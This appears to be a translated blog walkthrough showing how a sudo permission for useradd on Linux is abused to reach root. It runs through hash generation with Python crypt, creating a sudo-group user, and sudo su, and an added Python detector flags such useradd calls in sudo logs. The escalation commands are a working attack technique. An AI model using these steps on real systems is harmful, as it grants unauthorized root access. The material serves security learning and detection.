  • Privilege escalation with sudo useradd

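    sudo combined with the useradd command can also be used for privilege escalation. The overall idea is to add a user whose group is sudo, then use that new user to run sudo su and become root.

    First, look at what useradd needs in order to add such a user: a group and a password. useradd has the following options for this: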

    Usage: useradd [options] LOGIN
           useradd -D
           useradd -D [options]
    
    Options:
      -g, --gid GROUP               name or ID of the primary group of the new account
      -m, --create-home             create the user's home directory
      -p, --password PASSWORD       encrypted password of the new account

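    -g specifies the group. -m creates the home directory, since logging in needs a default home directory. -p specifies the password, which must be supplied in encrypted (hashed) form.

    Step 1: Generate the password hash. Python's crypt library is used here; 123456 is the password and hh is an arbitrary value that acts as the salt.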

    test@test:/etc/ppp$ python
    Python 2.7.16 (default, Oct 10 2019, 22:02:15)
    [GCC 8.3.0] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import crypt
    import crypt
    >>> crypt.crypt("123456","hh")
    crypt.crypt("123456","hh")
    'hhYwUmQRSuCZ.'
    >>> exit
    exit
    Use exit() or Ctrl-D (i.e. EOF) to exit
    >>> exit()
    exit()
    test@test:/etc/ppp$

    Step 2: Use the hash generated above with sudo useradd to add a user in the sudo group. This creates a user named test2 whose password is 123456.

    test@test:/etc/ppp$ sudo /usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2

    Step 3: Switch to the test2 user

    test@test:/etc/ppp$ su test2
    su test2
    Password: 123456

    $ id
    id
    uid=1003(test2) gid=27(sudo) groups=27(sudo)

    Step 4: Switch to the root user

    $ sudo su
    sudo su

    We trust you have received the usual lecture from the local System
    Administrator. It usually boils down to these three things:

        #1) Respect the privacy of others.
        #2) Think before you type.
        #3) With great power comes great responsibility.

    [sudo] password for test2: 123456
    root@test:/etc/ppp#

    Privilege escalation to root is complete.
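
The detection side of the steps above, as an added example that is not part of the original post: it scans sudo's syslog lines for useradd invocations that place the new account in a privileged group or pass a password hash on the command line. The group list, the finding labels and the sample log lines are assumptions constructed for illustration.

```python
import re

# Groups assumed to grant root via sudoers (adjust for the distribution in use).
PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "root", "0"}
SUDO_LINE = re.compile(r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
VALUE_OPTS = {"-g": "gid", "--gid": "gid", "-G": "groups", "--groups": "groups",
              "-p": "password", "--password": "password"}

# Constructed sample lines in sudo's syslog format (not taken from a real host).
SAMPLE_LOG = [
    "Dec 16 10:02:11 test sudo:     test : TTY=pts/0 ; PWD=/etc/ppp ; USER=root ; "
    "COMMAND=/usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2",
    "Dec 16 10:05:40 test sudo:     ops : TTY=pts/1 ; PWD=/home/ops ; USER=root ; "
    "COMMAND=/usr/sbin/useradd -m alice",
    "Dec 16 10:07:02 test sudo:     ops : TTY=pts/1 ; PWD=/home/ops ; USER=root ; "
    "COMMAND=/usr/sbin/useradd --gid=wheel -G adm bob",
]

def parse_useradd(argv):
    """Return the values of the group and password options in a useradd argv."""
    found, i = {}, 1
    while i < len(argv):
        arg = argv[i]
        name, sep, value = arg.partition("=")
        if arg.startswith("--") and sep and name in VALUE_OPTS:      # --gid=sudo
            found[VALUE_OPTS[name]] = value
        elif arg in VALUE_OPTS and i + 1 < len(argv):                # -g sudo / --gid sudo
            found[VALUE_OPTS[arg]] = argv[i + 1]
            i += 1
        elif not arg.startswith("--") and arg[:2] in VALUE_OPTS and len(arg) > 2:  # -gsudo
            found[VALUE_OPTS[arg[:2]]] = arg[2:]
        i += 1
    return found

def findings(line):
    """Return the reasons a sudo log line deserves review (empty list if none)."""
    m = SUDO_LINE.search(line)
    argv = m.group("cmd").split() if m else []
    if not argv or argv[0].rsplit("/", 1)[-1] != "useradd":
        return []
    opts, out = parse_useradd(argv), []
    groups = {opts.get("gid", "")} | set(opts.get("groups", "").split(","))
    if groups & PRIVILEGED_GROUPS:
        out.append("privileged-group:" + ",".join(sorted(groups & PRIVILEGED_GROUPS)))
    if "password" in opts:
        out.append("password-on-cmdline")
        if len(opts["password"]) == 13 and not opts["password"].startswith("$"):
            out.append("legacy-des-hash")  # 13-char traditional crypt(3) output
    return out
```

Any sudoers rule that lets a non-root user run useradd as root is equivalent to granting root, so the findings are most useful next to a review of which accounts hold such a rule.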

  • Original article: https://www.cnblogs.com/zlgxzswjy/p/15699202.html